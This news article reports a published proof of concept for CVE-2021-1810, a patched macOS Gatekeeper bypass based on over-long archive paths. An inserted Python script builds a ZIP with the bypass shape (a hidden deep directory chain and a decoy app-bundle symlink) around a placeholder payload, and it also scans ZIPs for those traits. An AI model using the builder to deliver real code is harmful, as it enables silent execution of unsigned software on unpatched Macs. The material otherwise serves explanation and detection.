Rasmus Sten, a software engineer with F-Secure, has released proof-of-concept (PoC) exploit code for a macOS Gatekeeper bypass that Apple patched in April this year.
The PoC exploit targets CVE-2021-1810, a vulnerability that could result in the bypass of all three protections that Apple implemented against malicious file downloads, namely file quarantine, Gatekeeper, and notarization.
The issue was identified in the Archive Utility component of macOS Big Sur and Catalina and can be exploited using a specially crafted ZIP file. Successful exploitation requires the attacker to trick the user into downloading and opening the archive, which then executes the malicious code within.
By exploiting the vulnerability, an attacker could execute unsigned binaries on macOS devices, even with Gatekeeper enforcing code signatures and without the user being alerted to the malicious code execution.
The vulnerability, Sten explains, is related to the manner in which Archive Utility handles file paths. Specifically, the software engineer found that, for paths longer than 886 characters, the com.apple.quarantine extended attribute was no longer applied, resulting in a Gatekeeper bypass for the extracted files.
While researching edge cases with long path names, Sten found that some macOS components behaved unexpectedly when the total path length reached a certain limit.
Eventually, Sten found that it was possible to create an archive with a hierarchical structure whose path length was long enough that Safari would call Archive Utility to unpack it and Archive Utility would not apply the com.apple.quarantine attribute, yet short enough for the result to be browsable in Finder and for macOS to execute the code within.
“In order to make it more appealing to the user, the archive folder structure could be hidden (prefixed with a full stop) with a symbolic link in the root which was almost indistinguishable from a single app bundle in the archive root,” the researcher explains.
Sten, who also released a video demo of the exploit, has published PoC code that creates an archive with the path length necessary to exploit CVE-2021-1810, along with a symbolic link to make the ZIP file look normal.
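The script below is an added example, not Sten's PoC and not code from the article. It builds a ZIP with the shape the article describes (a dot-prefixed directory chain deeper than the reported 886-character threshold, a placeholder executable at the bottom, and a root-level symlink that looks like a lone app bundle) and, for defenders, scans any ZIP for those same traits. The bundle name `Demo.app`, the hidden directory `.d`, the segment width, and the placeholder payload are assumptions made here. The scanner measures ZIP entry names, which are shorter than the full path after extraction into a download folder, so the threshold is used as a heuristic rather than an exact reproduction of what Archive Utility measured.

```python
import io
import posixpath
import stat
import zipfile

# Path-length threshold past which the article reports that Archive Utility
# stopped applying com.apple.quarantine (CVE-2021-1810, fixed in macOS 11.3).
QUARANTINE_PATH_LIMIT = 886

# Constructed names for this example; not taken from the published PoC.
BUNDLE = "Demo.app"
PAYLOAD = posixpath.join(BUNDLE, "Contents", "MacOS", "Demo")
HIDDEN_ROOT = ".d"          # dot-prefixed so Finder hides the deep tree
SEGMENT = "x" * 100         # one directory level of the padding chain


def _zipinfo(name, mode, is_link=False):
    """ZipInfo carrying Unix mode bits so unzip restores exec bits / symlinks."""
    zi = zipfile.ZipInfo(name)
    kind = stat.S_IFLNK if is_link else stat.S_IFREG
    zi.external_attr = (kind | mode) << 16   # Unix mode lives in the high 16 bits
    zi.create_system = 3                     # 3 = Unix
    return zi


def build_deep_archive(limit=QUARANTINE_PATH_LIMIT):
    """Return ZIP bytes shaped like the bypass archive described in the article."""
    prefix = HIDDEN_ROOT
    # Grow the hidden directory chain until the payload path exceeds the limit.
    while len(posixpath.join(prefix, PAYLOAD)) <= limit:
        prefix = posixpath.join(prefix, SEGMENT)
    deep_payload = posixpath.join(prefix, PAYLOAD)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Placeholder "binary": a shell script standing in for an unsigned Mach-O.
        zf.writestr(_zipinfo(deep_payload, 0o755),
                    "#!/bin/sh\necho constructed placeholder payload\n")
        # Root-level symlink named like the bundle, pointing at the deep bundle dir.
        zf.writestr(_zipinfo(BUNDLE, 0o755, is_link=True),
                    posixpath.join(prefix, BUNDLE))
    return buf.getvalue()


def build_benign_archive():
    """A shallow archive with the same bundle layout, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(_zipinfo(PAYLOAD, 0o755), "#!/bin/sh\necho ok\n")
    return buf.getvalue()


def max_path_length(data):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return max(len(zi.filename) for zi in zf.infolist())


def scan_archive(data, limit=QUARANTINE_PATH_LIMIT):
    """Flag the traits that made the bypass archive work: over-long entry
    paths, symlink entries, and root-level symlinks into a hidden directory."""
    findings = {"long_paths": [], "symlinks": [], "root_links_into_hidden": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            if len(zi.filename) > limit:
                findings["long_paths"].append(zi.filename)
            mode = zi.external_attr >> 16
            if stat.S_ISLNK(mode):
                # For a symlink entry the stored "content" is the link target.
                target = zf.read(zi).decode("utf-8", "replace")
                findings["symlinks"].append((zi.filename, target))
                at_root = "/" not in zi.filename.rstrip("/")
                if at_root and target.split("/")[0].startswith("."):
                    findings["root_links_into_hidden"].append(zi.filename)
    return findings


if __name__ == "__main__":
    sample = build_deep_archive()
    print("longest entry path:", max_path_length(sample))
    for key, hits in scan_archive(sample).items():
        print(f"{key}: {hits}")
```

On a macOS host the ground truth is still `xattr -l` on the unpacked files: on an unpatched Big Sur or Catalina system the deep payload would lack `com.apple.quarantine` after Archive Utility expanded the ZIP, while on 11.3 and later the attribute is applied. The scanner above only spots the archive shape and cannot confirm that behaviour offline.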
The vulnerability was addressed with the release of macOS Big Sur 11.3 and Security Update 2021-002 for Catalina.